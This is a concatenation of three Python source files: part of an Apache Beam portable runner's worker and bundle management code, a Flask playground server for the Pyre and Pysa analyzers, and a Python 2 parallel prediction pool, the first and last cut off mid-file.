beam_fn_api_pb2.LogEntry.Severity.ERROR: logging.ERROR,
beam_fn_api_pb2.LogEntry.Severity.WARN: logging.WARNING,
beam_fn_api_pb2.LogEntry.Severity.NOTICE: logging.INFO + 1,
beam_fn_api_pb2.LogEntry.Severity.INFO: logging.INFO,
beam_fn_api_pb2.LogEntry.Severity.DEBUG: logging.DEBUG,
beam_fn_api_pb2.LogEntry.Severity.TRACE: logging.DEBUG - 1,
beam_fn_api_pb2.LogEntry.Severity.UNSPECIFIED: logging.NOTSET,
}
def Logging(self, log_messages, context=None):
yield beam_fn_api_pb2.LogControl()
for log_message in log_messages:
for log in log_message.log_entries:
logging.log(self.LOG_LEVEL_MAP[log.severity], str(log))
class BasicProvisionService(
beam_provision_api_pb2_grpc.ProvisionServiceServicer):
def __init__(self, info):
self._info = info
def GetProvisionInfo(self, request, context=None):
return beam_provision_api_pb2.GetProvisionInfoResponse(
info=self._info)
class EmptyArtifactRetrievalService(
beam_artifact_api_pb2_grpc.ArtifactRetrievalServiceServicer):
def GetManifest(self, request, context=None):
return beam_artifact_api_pb2.GetManifestResponse(
manifest=beam_artifact_api_pb2.Manifest())
def GetArtifact(self, request, context=None):
raise ValueError('No artifacts staged.')
class GrpcServer(object):
_DEFAULT_SHUTDOWN_TIMEOUT_SECS = 5
def __init__(self, state, provision_info):
self.state = state
self.provision_info = provision_info
self.control_server = grpc.server(UnboundedThreadPoolExecutor())
self.control_port = self.control_server.add_insecure_port('[::]:0')
self.control_address = 'localhost:%s' % self.control_port
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size
# is controlled in a layer above.
no_max_message_sizes = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
self.data_server = grpc.server(
UnboundedThreadPoolExecutor(),
options=no_max_message_sizes)
self.data_port = self.data_server.add_insecure_port('[::]:0')
self.state_server = grpc.server(
UnboundedThreadPoolExecutor(),
options=no_max_message_sizes)
self.state_port = self.state_server.add_insecure_port('[::]:0')
self.control_handler = BeamFnControlServicer()
beam_fn_api_pb2_grpc.add_BeamFnControlServicer_to_server(
self.control_handler, self.control_server)
# If we have provision info, serve these off the control port as well.
if self.provision_info:
if self.provision_info.provision_info:
provision_info = self.provision_info.provision_info
if not provision_info.worker_id:
provision_info = copy.copy(provision_info)
provision_info.worker_id = str(uuid.uuid4())
beam_provision_api_pb2_grpc.add_ProvisionServiceServicer_to_server(
BasicProvisionService(self.provision_info.provision_info),
self.control_server)
if self.provision_info.artifact_staging_dir:
service = artifact_service.BeamFilesystemArtifactService(
self.provision_info.artifact_staging_dir)
else:
service = EmptyArtifactRetrievalService()
beam_artifact_api_pb2_grpc.add_ArtifactRetrievalServiceServicer_to_server(
service, self.control_server)
self.data_plane_handler = data_plane.BeamFnDataServicer()
beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(
self.data_plane_handler, self.data_server)
beam_fn_api_pb2_grpc.add_BeamFnStateServicer_to_server(
FnApiRunner.GrpcStateServicer(state),
self.state_server)
self.logging_server = grpc.server(
UnboundedThreadPoolExecutor(),
options=no_max_message_sizes)
self.logging_port = self.logging_server.add_insecure_port('[::]:0')
beam_fn_api_pb2_grpc.add_BeamFnLoggingServicer_to_server(
BasicLoggingService(),
self.logging_server)
_LOGGER.info('starting control server on port %s', self.control_port)
_LOGGER.info('starting data server on port %s', self.data_port)
_LOGGER.info('starting state server on port %s', self.state_port)
_LOGGER.info('starting logging server on port %s', self.logging_port)
self.logging_server.start()
self.state_server.start()
self.data_server.start()
self.control_server.start()
def close(self):
self.control_handler.done()
to_wait = [
self.control_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.data_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.state_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.logging_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS)
]
for w in to_wait:
w.wait()
class GrpcWorkerHandler(WorkerHandler):
"""An grpc based worker_handler for fn API control, state and data planes."""
def __init__(self, state, provision_info, grpc_server):
self._grpc_server = grpc_server
super(GrpcWorkerHandler, self).__init__(
self._grpc_server.control_handler, self._grpc_server.data_plane_handler,
state, provision_info)
self.state = state
self.control_address = self.port_from_worker(self._grpc_server.control_port)
self.control_conn = self._grpc_server.control_handler.get_conn_by_worker_id(
self.worker_id)
self.data_conn = self._grpc_server.data_plane_handler.get_conn_by_worker_id(
self.worker_id)
def data_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.data_port))
def state_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.state_port))
def logging_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url=self.port_from_worker(self._grpc_server.logging_port))
def close(self):
self.control_conn.close()
self.data_conn.close()
super(GrpcWorkerHandler, self).close()
def port_from_worker(self, port):
return '%s:%s' % (self.host_from_worker(), port)
def host_from_worker(self):
return 'localhost'
@WorkerHandler.register_environment(
common_urns.environments.EXTERNAL.urn, beam_runner_api_pb2.ExternalPayload)
class ExternalWorkerHandler(GrpcWorkerHandler):
def __init__(self, external_payload, state, provision_info, grpc_server):
super(ExternalWorkerHandler, self).__init__(state, provision_info,
grpc_server)
self._external_payload = external_payload
def start_worker(self):
stub = beam_fn_api_pb2_grpc.BeamFnExternalWorkerPoolStub(
GRPCChannelFactory.insecure_channel(
self._external_payload.endpoint.url))
response = stub.StartWorker(
beam_fn_api_pb2.StartWorkerRequest(
worker_id=self.worker_id,
control_endpoint=endpoints_pb2.ApiServiceDescriptor(
url=self.control_address),
logging_endpoint=self.logging_api_service_descriptor(),
params=self._external_payload.params))
if response.error:
raise RuntimeError("Error starting worker: %s" % response.error)
def stop_worker(self):
pass
def host_from_worker(self):
import socket
return socket.getfqdn()
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON_GRPC, bytes)
class EmbeddedGrpcWorkerHandler(GrpcWorkerHandler):
def __init__(self, payload, state, provision_info, grpc_server):
super(EmbeddedGrpcWorkerHandler, self).__init__(state, provision_info,
grpc_server)
if payload:
state_cache_size = payload.decode('ascii')
self._state_cache_size = int(state_cache_size)
else:
self._state_cache_size = STATE_CACHE_SIZE
def start_worker(self):
self.worker = sdk_worker.SdkHarness(
self.control_address, state_cache_size=self._state_cache_size,
worker_id=self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.daemon = True
self.worker_thread.start()
def stop_worker(self):
self.worker_thread.join()
# The subprocesses module is not threadsafe on Python 2.7. Use this lock to
# prevent concurrent calls to POpen().
SUBPROCESS_LOCK = threading.Lock()
@WorkerHandler.register_environment(python_urns.SUBPROCESS_SDK, bytes)
class SubprocessSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self, worker_command_line, state, provision_info, grpc_server):
super(SubprocessSdkWorkerHandler, self).__init__(state, provision_info,
grpc_server)
self._worker_command_line = worker_command_line
def start_worker(self):
from apache_beam.runners.portability import local_job_service
self.worker = local_job_service.SubprocessSdkWorker(
self._worker_command_line, self.control_address, self.worker_id)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.start()
def stop_worker(self):
self.worker_thread.join()
@WorkerHandler.register_environment(common_urns.environments.DOCKER.urn,
beam_runner_api_pb2.DockerPayload)
class DockerSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self, payload, state, provision_info, grpc_server):
super(DockerSdkWorkerHandler, self).__init__(state, provision_info,
grpc_server)
self._container_image = payload.container_image
self._container_id = None
def host_from_worker(self):
if sys.platform == "darwin":
# See https://docs.docker.com/docker-for-mac/networking/
return 'host.docker.internal'
else:
return super(DockerSdkWorkerHandler, self).host_from_worker()
def start_worker(self):
with SUBPROCESS_LOCK:
try:
subprocess.check_call(['docker', 'pull', self._container_image])
except Exception:
_LOGGER.info('Unable to pull image %s' % self._container_image)
self._container_id = subprocess.check_output(
['docker',
'run',
'-d',
# TODO: credentials
'--network=host',
self._container_image,
'--id=%s' % self.worker_id,
'--logging_endpoint=%s' % self.logging_api_service_descriptor().url,
'--control_endpoint=%s' % self.control_address,
'--artifact_endpoint=%s' % self.control_address,
'--provision_endpoint=%s' % self.control_address,
]).strip()
while True:
status = subprocess.check_output([
'docker',
'inspect',
'-f',
'{{.State.Status}}',
self._container_id]).strip()
_LOGGER.info('Waiting for docker to start up.Current status is %s' %
status)
if status == b'running':
_LOGGER.info('Docker container is running. container_id = %s, '
'worker_id = %s', self._container_id, self.worker_id)
break
elif status in (b'dead', b'exited'):
subprocess.call([
'docker',
'container',
'logs',
self._container_id])
raise RuntimeError('SDK failed to start. Final status is %s' % status)
time.sleep(1)
def stop_worker(self):
if self._container_id:
with SUBPROCESS_LOCK:
subprocess.call([
'docker',
'kill',
self._container_id])
class WorkerHandlerManager(object):
def __init__(self, environments, job_provision_info):
self._environments = environments
self._job_provision_info = job_provision_info
self._cached_handlers = collections.defaultdict(list)
self._state = FnApiRunner.StateServicer() # rename?
self._grpc_server = None
def get_worker_handlers(self, environment_id, num_workers):
if environment_id is None:
# Any environment will do, pick one arbitrarily.
environment_id = next(iter(self._environments.keys()))
environment = self._environments[environment_id]
# assume all environments except EMBEDDED_PYTHON use gRPC.
if environment.urn == python_urns.EMBEDDED_PYTHON:
pass # no need for a gRPC server
elif self._grpc_server is None:
self._grpc_server = GrpcServer(self._state, self._job_provision_info)
worker_handler_list = self._cached_handlers[environment_id]
if len(worker_handler_list) < num_workers:
for _ in range(len(worker_handler_list), num_workers):
worker_handler = WorkerHandler.create(
environment, self._state, self._job_provision_info,
self._grpc_server)
_LOGGER.info("Created Worker handler %s for environment %s",
worker_handler, environment)
self._cached_handlers[environment_id].append(worker_handler)
worker_handler.start_worker()
return self._cached_handlers[environment_id][:num_workers]
def close_all(self):
for worker_handler_list in self._cached_handlers.values():
for worker_handler in set(worker_handler_list):
try:
worker_handler.close()
except Exception:
_LOGGER.error("Error closing worker_handler %s" % worker_handler,
exc_info=True)
self._cached_handlers = {}
if self._grpc_server is not None:
self._grpc_server.close()
self._grpc_server = None
class ExtendedProvisionInfo(object):
def __init__(self, provision_info=None, artifact_staging_dir=None):
self.provision_info = (
provision_info or beam_provision_api_pb2.ProvisionInfo())
self.artifact_staging_dir = artifact_staging_dir
_split_managers = []
@contextlib.contextmanager
def split_manager(stage_name, split_manager):
"""Registers a split manager to control the flow of elements to a given stage.
Used for testing.
A split manager should be a coroutine yielding desired split fractions,
receiving the corresponding split results. Currently, only one input is
supported.
"""
try:
_split_managers.append((stage_name, split_manager))
yield
finally:
_split_managers.pop()
class BundleManager(object):
"""Manages the execution of a bundle from the runner-side.
This class receives a bundle descriptor, and performs the following tasks:
- Registration of the bundle with the worker.
- Splitting of the bundle
- Setting up any other bundle requirements (e.g. side inputs).
- Submitting the bundle to worker for execution
- Passing bundle input data to the worker
- Collecting bundle output data from the worker
- Finalizing the bundle.
"""
_uid_counter = 0
_lock = threading.Lock()
def __init__(
self, worker_handler_list, get_buffer, get_input_coder_impl,
bundle_descriptor, progress_frequency=None, skip_registration=False,
cache_token_generator=FnApiRunner.get_cache_token_generator()):
"""Set up a bundle manager.
Args:
worker_handler_list
get_buffer (Callable[[str], list])
get_input_coder_impl (Callable[[str], Coder])
bundle_descriptor (beam_fn_api_pb2.ProcessBundleDescriptor)
progress_frequency
skip_registration
"""
self._worker_handler_list = worker_handler_list
self._get_buffer = get_buffer
self._get_input_coder_impl = get_input_coder_impl
self._bundle_descriptor = bundle_descriptor
self._registered = skip_registration
self._progress_frequency = progress_frequency
self._worker_handler = None
self._cache_token_generator = cache_token_generator
def _send_input_to_worker(self,
process_bundle_id,
read_transform_id,
byte_streams):
data_out = self._worker_handler.data_conn.output_stream(
process_bundle_id, read_transform_id)
for byte_stream in byte_streams:
data_out.write(byte_stream)
data_out.close()
def _register_bundle_descriptor(self):
if self._registered:
registration_future = None
else:
process_bundle_registration = beam_fn_api_pb2.InstructionRequest(
register=beam_fn_api_pb2.RegisterRequest(
process_bundle_descriptor=[self._bundle_descriptor]))
registration_future = self._worker_handler.control_conn.push(
process_bundle_registration)
self._registered = True
return registration_future
def _select_split_manager(self):
"""TODO(pabloem) WHAT DOES THIS DO"""
unique_names = set(
t.unique_name for t in self._bundle_descriptor.transforms.values())
for stage_name, candidate in reversed(_split_managers):
if (stage_name in unique_names
or (stage_name + '/Process') in unique_names):
split_manager = candidate
break
else:
split_manager = None
return split_manager
def _generate_splits_for_testing(self,
split_manager,
inputs,
process_bundle_id):
split_results = []
read_transform_id, buffer_data = only_element(inputs.items())
byte_stream = b''.join(buffer_data)
num_elements = len(list(
self._get_input_coder_impl(read_transform_id).decode_all(byte_stream)))
# Start the split manager in case it wants to set any breakpoints.
split_manager_generator = split_manager(num_elements)
try:
split_fraction = next(split_manager_generator)
done = False
except StopIteration:
done = True
# Send all the data.
self._send_input_to_worker(
process_bundle_id, read_transform_id, [byte_stream])
# Execute the requested splits.
while not done:
if split_fraction is None:
split_result = None
else:
split_request = beam_fn_api_pb2.InstructionRequest(
process_bundle_split=
beam_fn_api_pb2.ProcessBundleSplitRequest(
instruction_id=process_bundle_id,
desired_splits={
read_transform_id:
beam_fn_api_pb2.ProcessBundleSplitRequest.DesiredSplit(
fraction_of_remainder=split_fraction,
estimated_input_elements=num_elements)
}))
split_response = self._worker_handler.control_conn.push(
split_request).get()
for t in (0.05, 0.1, 0.2):
waiting = ('Instruction not running', 'not yet scheduled')
if any(msg in split_response.error for msg in waiting):
time.sleep(t)
split_response = self._worker_handler.control_conn.push(
split_request).get()
if 'Unknown process bundle' in split_response.error:
# It may have finished too fast.
split_result = None
elif split_response.error:
raise RuntimeError(split_response.error)
else:
split_result = split_response.process_bundle_split
split_results.append(split_result)
try:
split_fraction = split_manager_generator.send(split_result)
except StopIteration:
break
return split_results
def process_bundle(self, inputs, expected_outputs):
# Unique id for the instruction processing this bundle.
with BundleManager._lock:
BundleManager._uid_counter += 1
process_bundle_id = 'bundle_%s' % BundleManager._uid_counter
self._worker_handler = self._worker_handler_list[
BundleManager._uid_counter % len(self._worker_handler_list)]
# Register the bundle descriptor, if needed - noop if already registered.
registration_future = self._register_bundle_descriptor()
# Check that the bundle was successfully registered.
if registration_future and registration_future.get().error:
raise RuntimeError(registration_future.get().error)
split_manager = self._select_split_manager()
if not split_manager:
# If there is no split_manager, write all input data to the channel.
for transform_id, elements in inputs.items():
self._send_input_to_worker(
process_bundle_id, transform_id, elements)
# Actually start the bundle.
process_bundle_req = beam_fn_api_pb2.InstructionRequest(
instruction_id=process_bundle_id,
process_bundle=beam_fn_api_pb2.ProcessBundleRequest(
process_bundle_descriptor_id=self._bundle_descriptor.id,
cache_tokens=[next(self._cache_token_generator)]))
result_future = self._worker_handler.control_conn.push(process_bundle_req)
split_results = []
with ProgressRequester(
self._worker_handler, process_bundle_id, self._progress_frequency):
if split_manager:
split_results = self._generate_splits_for_testing(
split_manager, inputs, process_bundle_id)
# Gather all output data.
for output in self._worker_handler.data_conn.input_elements(
process_bundle_id,
expected_outputs.keys(),
abort_callback=lambda: (result_future.is_done()
and result_future.get().error)):
if output.transform_id in expected_outputs:
with BundleManager._lock:
self._get_buffer(
expected_outputs[output.transform_id]).append(output.data)
_LOGGER.debug('Wait for the bundle %s to finish.' % process_bundle_id)
result = result_future.get()
if result.error:
raise RuntimeError(result.error)
if result.process_bundle.requires_finalization:
finalize_request = beam_fn_api_pb2.InstructionRequest(
finalize_bundle=
beam_fn_api_pb2.FinalizeBundleRequest(
instruction_id=process_bundle_id
))
self._worker_handler.control_conn.push(finalize_request)
return result, split_results
class ParallelBundleManager(BundleManager):
def __init__(
self, worker_handler_list, get_buffer, get_input_coder_impl,
bundle_descriptor, progress_frequency=None, skip_registration=False,
cache_token_generator=None, **kwargs):
super(ParallelBundleManager, self).__init__(
worker_handler_list, get_buffer, get_input_coder_impl,
bundle_descriptor, progress_frequency, skip_registration,
cache_token_generator=cache_token_generator)
self._num_workers = kwargs.pop('num_workers', 1)
def process_bundle(self, inputs, expected_outputs):
part_inputs = [{} for _ in range(self._num_workers)]
for name, input in inputs.items():
for ix, part in enumerate(input.partition(self._num_workers)):
part_inputs[ix][name] = part
merged_result = None
split_result_list = []
with UnboundedThreadPoolExecutor() as executor:
for result, split_result in executor.map(lambda part: BundleManager(
self._worker_handler_list, self._get_buffer,
self._get_input_coder_impl, self._bundle_descriptor,
self._progress_frequency, self._registered,
cache_token_generator=self._cache_token_generator).process_bundle(
part, expected_outputs), part_inputs):
split_result_list += split_result
if merged_result is None:
merged_result = result
else:
merged_result = beam_fn_api_pb2.InstructionResponse(
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
monitoring_infos=monitoring_infos.consolidate(
itertools.chain(
result.process_bundle.monitoring_infos,
merged_result.process_bundle.monitoring_infos))),
error=result.error or merged_result.error)
return merged_result, split_result_list
class ProgressRequester(threading.Thread):
""" Thread that asks SDK Worker for progress reports with a certain frequency.
A callback can be passed to call with progress updates.
"""
def __init__(self, worker_handler, instruction_id, frequency, callback=None):
super(ProgressRequester, self).__init__()
self._worker_handler = worker_handler
self._instruction_id = instruction_id
self._frequency = frequency
self._done = False
self._latest_progress = None
self._callback = callback
self.daemon = True
def __enter__(self):
if self._frequency:
self.start()
def __exit__(self, *unused_exc_info):
if self._frequency:
self.stop()
def run(self):
while not self._done:
try:
progress_result = self._worker_handler.control_conn.push(
beam_fn_api_pb2.InstructionRequest(
process_bundle_progress=
beam_fn_api_pb2.ProcessBundleProgressRequest(
instruction_id=self._instruction_id))).get()
self._latest_progress = progress_result.process_bundle_progress
if self._callback:
self._callback(self._latest_progress)
except Exception as exn:
_LOGGER.error("Bad progress: %s", exn)
time.sleep(self._frequency)
def stop(self):
self._done = True
class ControlFuture(object):
def __init__(self, instruction_id, response=None):
self.instruction_id = instruction_id
if response:
self._response = response
else:
self._response = None
self._condition = threading.Condition()
def is_done(self):
return self._response is not None
def set(self, response):
with self._condition:
self._response = response
self._condition.notify_all()
def get(self, timeout=None):
if not self._response:
with self._condition:
if not self._response:
self._condition.wait(timeout)
return self._response
class FnApiMetrics(metric.MetricResults):
def __init__(self, step_monitoring_infos, user_metrics_only=True):
"""Used for querying metrics from the PipelineResult object.
step_monitoring_infos: Per step metrics specified as MonitoringInfos.
user_metrics_only: If true, includes user metrics only.
"""
self._counters = {}
self._distributions = {}
self._gauges = {}
self._user_metrics_only = user_metrics_only
self._monitoring_infos = step_monitoring_infos
for smi in step_monitoring_infos.values():
counters, distributions, gauges = \
portable_metrics.from_monitoring_infos(smi, user_metrics_only)
self._counters.update(counters)
self._distributions.update(distributions)
self._gauges.update(gauges)
def query(self, filter=None):
counters = [MetricResult(k, v, v)
for k, v in self._counters.items()
if self.matches(filter, k)]
distributions = [MetricResult(k, v, v)
for k, v in self._distributions.items()
if self.matches(filter, k)]
gauges = [MetricResult(k, v, v)
for k, v in self._gauges.items()
if self.matches(filter, k)]
return {self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges}
def monitoring_infos(self):
return [item for sublist in self._monitoring_infos.values() for item in
sublist]
class RunnerResult(runner.PipelineResult):
def __init__(self, state, monitoring_infos_by_stage, metrics_by_stage):
super(RunnerResult, self).__init__(state)
self._monitoring_infos_by_stage = monitoring_infos_by_stage
self._metrics_by_stage = metrics_by_stage
self._metrics = None
self._monitoring_metrics = None
def wait_until_finish(self, duration=None):
return self._state
def metrics(self):
"""Returns a queryable object including user metrics only."""
if self._metrics is None:
self._metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=True)
return self._metrics
def monitoring_metrics(self):
"""Returns a queryable object including all metrics."""
if self._monitoring_metrics is None:
self._monitoring_metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=False)
return self._monitoring_metrics
|
application.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
import argparse
import json
import logging
import os
import subprocess
import tempfile
import threading
from pathlib import Path
from typing import IO, List
from flask import Flask, request, jsonify
from flask_cors import CORS
from flask_socketio import SocketIO, emit
logging.basicConfig(
format="%(asctime)s %(levelname)s %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=logging.DEBUG,
)
LOG: logging.Logger = logging.getLogger(__name__)
CUSTOM_PYSA_MODEL_FILE: str = "custom.pysa"
WATCHMAN_CONFIG_FILE: str = ".watchmanconfig"
PYRE_CONFIG_FILE: str = ".pyre_configuration"
INPUT_FILE: str = "input.py"
def _consume(stream: IO[str]) -> str:
buffer: List[str] = []
def _consume() -> None:
while True:
line = stream.readline()
if line:
decoded = line.strip()
LOG.debug(decoded)
buffer.append(decoded)
else:
break
thread = threading.Thread(target=_consume)
thread.start()
thread.join()
return "\n".join(buffer)
class Pyre:
def __init__(self) -> None:
self._directory: Path = Path(tempfile.mkdtemp())
LOG.debug(f"Starting server in `{self._directory}`...")
pyre_configuration = json.dumps(
{
"source_directories": ["."],
}
)
LOG.debug(f"Writing configuration:\n{pyre_configuration}")
pyre_configuration_path = self._directory / PYRE_CONFIG_FILE
pyre_configuration_path.write_text(pyre_configuration)
LOG.debug("Writing watchman configuration")
watchman_configuration_path = self._directory / WATCHMAN_CONFIG_FILE
watchman_configuration_path.write_text("{}\n")
LOG.debug("Starting watchman")
subprocess.check_call(["watchman", "watch", str(self._directory)])
LOG.debug("Priming the server")
# TODO(T82114844): incremental is borked on Ubuntu 20.04.
subprocess.check_call(
["pyre", "--noninteractive", "check"], cwd=self._directory
)
def check(self, input: str) -> str:
LOG.debug("Running pyre check")
code_path = self._directory / INPUT_FILE
code_path.write_text(input)
# TODO(T82114844): incremental is borked on Ubuntu 20.04.
with subprocess.Popen(
["pyre", "--output=json", "--noninteractive", "check"],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
cwd=self._directory,
text=True,
) as process:
# pyre-fixme[6]: Expected `IO[bytes]` for 1st param but got
# `Optional[IO[typing.Any]]`.
stderr = _consume(process.stderr)
# pyre-fixme[6]: Expected `IO[bytes]` for 1st param but got
# `Optional[IO[typing.Any]]`.
stdout = _consume(process.stdout)
return_code = process.wait()
if return_code > 1:
LOG.error(f"Returning error: {stderr}")
result = jsonify(errors=[stderr])
else:
errors = json.loads(stdout)
result = jsonify(data={"errors": errors, "stderr": stderr})
return result
class Pysa:
def __init__(
self, input: str, model: str = "", use_builtin_pysa_models: bool = False
) -> None:
self._directory: Path = Path(tempfile.mkdtemp())
self._stubs: Path = Path(tempfile.mkdtemp())
LOG.debug(f"Intializing Pysa in `{self._directory}`...")
pyre_configuration = json.dumps(
{
"source_directories": ["."],
"taint_models_path": [
str(self._stubs),
os.environ["PYSA_PLAYGROUND_TAINT_MODELS"],
]
if use_builtin_pysa_models
else str(self._stubs),
"search_path": [str(self._stubs), os.environ["PYSA_PLAYGROUND_STUBS"]],
}
)
LOG.debug(f"Writing configuration:\n{pyre_configuration}")
pyre_configuration_path = self._directory / PYRE_CONFIG_FILE
pyre_configuration_path.write_text(pyre_configuration)
if model:
LOG.debug("Writing custom model to pysa file")
model_path = self._stubs / CUSTOM_PYSA_MODEL_FILE
model_path.write_text(model)
LOG.debug(f"Writing code:\n{input}")
code_path = self._directory / INPUT_FILE
code_path.write_text(input)
def analyze(self) -> None:
LOG.debug("Running pysa")
with subprocess.Popen(
["pyre", "-n", "analyze"],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
cwd=self._directory,
text=True,
) as process:
model_verification_errors = []
model_verification_errors_found = False
for line in iter(process.stderr.readline, b""):
line = line.rstrip()
if line == "":
break
elif "DEBUG" in line:
continue
elif "ERROR" in line and "is not part of the environment" in line:
model_verification_errors.append(line)
model_verification_errors_found = True
continue
elif model_verification_errors_found:
# Emit all model verification lines together to prevent
# network overhead.
emit(
"pysa_results_channel",
{
"type": "output",
"line": "\n".join(model_verification_errors),
},
)
LOG.debug("\n".join(model_verification_errors))
LOG.debug(line)
emit("pysa_results_channel", {"type": "output", "line": line})
return_code = process.wait()
if return_code != 0:
result = {"type": "finished", "result": "error"}
else:
result = {"type": "finished", "result": "ok"}
emit("pysa_results_channel", result)
application = Flask(__name__)
# You may need to modify the origin to the pyre-check website
# before deployment.
CORS(application)
socketio = SocketIO(application, cors_allowed_origins="*")
@application.route("/check", methods=["GET", "POST"])
def check() -> str:
input = (
request.args.get("input")
or request.form.get("input")
or request.json.get("input")
)
if input is None:
return jsonify(errors=["Input not provided"])
LOG.info(f"Checking `{input}`...")
pyre = Pyre()
return pyre.check(input)
@socketio.on("analyze", namespace="/analyze")
def analyze(json) -> None:
input = json.get("input", None)
use_builtin_pysa_models = json.get("use_builtin_pysa_models", False)
model = json.get("model", "")
if input is None:
emit(
"pysa_results_channel",
{
"type": "finished",
"result": "error",
"reason": "No code given to analyze.",
},
)
else:
pysa = Pysa(input, model, use_builtin_pysa_models)
LOG.info(f"Checking `{input}`...")
pysa.analyze()
@application.route("/")
def index() -> str:
return "404"
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true")
arguments: argparse.Namespace = parser.parse_args()
socketio.run(application, debug=arguments.debug)
|
parallel.py
|
"""Classes and methods to run predictions in parallel."""
# stdlib
import os
import math
import time
from threading import Thread
from Queue import Queue as ThreadQueue
from multiprocessing import Process, Semaphore, cpu_count, Queue as ProcessQueue
# local
from .methods import Predictor
from ..microarraydata import MicroArrayData
from .. import config
#############################
# Parallelize #
#############################
class Pool(object):
"""Parallelize computing of Predictor tasks on one MicroArrayData dataset.
Specify the number of cores to use and other computational parameters. Add
prediction.Predicor subclassed tasks by using the add_task or add_tasks methods.
Finally, fit the data using fit(data) method.
Attributes:
folder (str, optional): Location of the folder to use for (possible) output of computations.
If not given, use for each folder its own setting.
print_fitting_time (int): Output a print statement every [print_fitting_time] seconds.
processes (int, optional): Number of simultaneous threads to use for multiprocessing.
randomize (bool): Randomize order of computation.
save_all_tasks (TYPE): Description
tasks (list): All prediction tasks that are to be computed. Add to this with the add_task or add_tasks methods.
verbose (int): Level of detailed output.
verbose == 0 :: no messages;
verbose >= 1 :: (default) messages of start and done methods and periodic small printouts;
verbose >= 2 :: set verbose level for all output methods too, for debugging tasks;
verbose >= 3 :: thread maintenance, for debugging this class.
"""
print_fitting_time = 600 # print once every 10 minutes.
# print_fitting_time = 10 # print once every 10 seconds.
def __init__(self, processes=None, tasks=None, folder=None, save_all_tasks=False, randomize=True, verbose=1):
"""Pool instance, where tasks can be added to
Args:
processes (None, optional): Description
tasks (None, optional): Description
folder (None, optional): Description
save_all_tasks (bool, optional): Description
randomize (bool, optional): Description
verbose (int, optional): Description
"""
self.processes = processes or config.ncores_total
self.folder = folder if folder is not None else config.folder_results
if not os.path.exists(self.folder):
if verbose: print '[Parallel] creating output folder at ' + self.folder
os.makedirs(self.folder)
self.save_all_tasks = save_all_tasks
self.randomize = randomize
self.verbose = verbose or config.verbose
self._semaphore = Semaphore(self.processes)
self.tasks = list()
if self.verbose:
if folder is not None:
print '[Parallel] overriding output folder of all tasks:', self.folder
else:
print '[Parallel] using default output folder for all tasks that have task.folder set to:', self.folder
if self.verbose >= 2: print '[Parallel] all prediction tasks are set to verbose'
if self.verbose >= 3: print '[Parallel] detailed thread output'
if tasks: self.add_tasks(tasks)
def add_task(self, task):
"""Add a task to the pool.
Args:
task (TYPE):
"""
# assert issubclass(type(task), Predictor) # not necessary..
try:
assert task.processes <= self.processes
if self.folder: task.folder = self.folder # override with this
if self.save_all_tasks: task.save = True
if self.verbose >= 2: task.verbose = True
self.tasks.append(task)
if self.verbose: print '[Parallel] added task', task.name, 'with', task.processes, 'proces{}.'.format('ses' if self.processes > 1 else '')
except AttributeError:
raise Exception('No processes found!')
def add_tasks(self, iterator):
for task in iter(iterator):
self.add_task(task)
def fit(self, data):
"""Main thread: adds task while semaphore free, else blocks.
Other thread is used to free up finished tasks. Quite simple to just
Args:
data (MicroArrayData): data.
"""
if self.verbose: print '[Parallel] fitting {} tasks with {} process{}...'.format(len(self.tasks),
self.processes, 'es' if self.processes > 1 else '')
assert issubclass(type(data), MicroArrayData)
start_time = time.time()
# need to use two different kinds of queues, one thread-safe and one process-safe
task_queue = ThreadQueue() # Pipe tasks between threads
result_queue = ProcessQueue() # Pipe results back to self.tasks list
# keep track of start time per task
def wrap_fit(task, data, index):
"""Wrapper of fit method, keep track of index of in self.task
list where the results will be put back to
"""
result_queue.put((task.fit(data), index))
# Thread - start processes and acquire semaphore
def add_processes(task_queue):
indices = range(len(self.tasks))
if self.randomize: random.shuffle(indices)
for index in indices:
task = self.tasks[index]
for _ in xrange(task.processes):
self._semaphore.acquire()
if self.verbose >= 3:
time.sleep(0.1)
print '[thread-start] acquired', task.processes, 'process{} for'.format('ses' if task.processes > 1 else ''), task.name
p = Process(target=wrap_fit, args=(task, data, index))
# Need non-daemonic threads to use multiprocessed python processes.
p.daemon = False
p.start()
# Put tuple of process and associated task in queue.
task_queue.put((p, task))
task_queue.put(None) # send sentinal
thread_add_processes = Thread(target=add_processes, args=(task_queue,))
thread_add_processes.start()
# Thread - maintain processes and release semaphore
def handle_processes(task_queue):
running_tasks = []
finished = False
print_count = 1
while not finished or len(running_tasks) > 0:
# check task_queue at intervals
if not task_queue.empty():
next_task = task_queue.get(timeout=0.1)
# receive STOP sentinal, finish
if next_task is None:
finished = True
else:
running_tasks.append(next_task)
# maintain process list;
for proc, task in running_tasks[:]:
if not proc.is_alive():
if self.verbose >= 3: print '[thread-maintain] releasing', task.processes, 'process{} for'.format('ses' if task.processes > 1 else ''), task.name
for _ in xrange(task.processes):
